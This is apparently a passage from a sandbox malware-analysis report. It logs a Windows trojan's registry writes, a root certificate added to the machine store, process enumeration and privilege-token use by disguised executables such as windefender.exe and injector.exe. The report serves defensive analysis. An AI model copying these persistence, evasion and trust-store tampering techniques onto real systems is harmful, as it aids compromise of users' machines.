Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-3052 = "Qyzylorda Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2611 = "Bougainville Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-572 = "China Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2772 = "Omsk Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
N/A N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
N/A N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
N/A N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
N/A N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
N/A N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
N/A N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
N/A N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
N/A N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
N/A N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
N/A N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
N/A N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
N/A N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
N/A N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
N/A N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
N/A N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
N/A N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
N/A N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
N/A N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
N/A N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
N/A N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
N/A N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
N/A N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
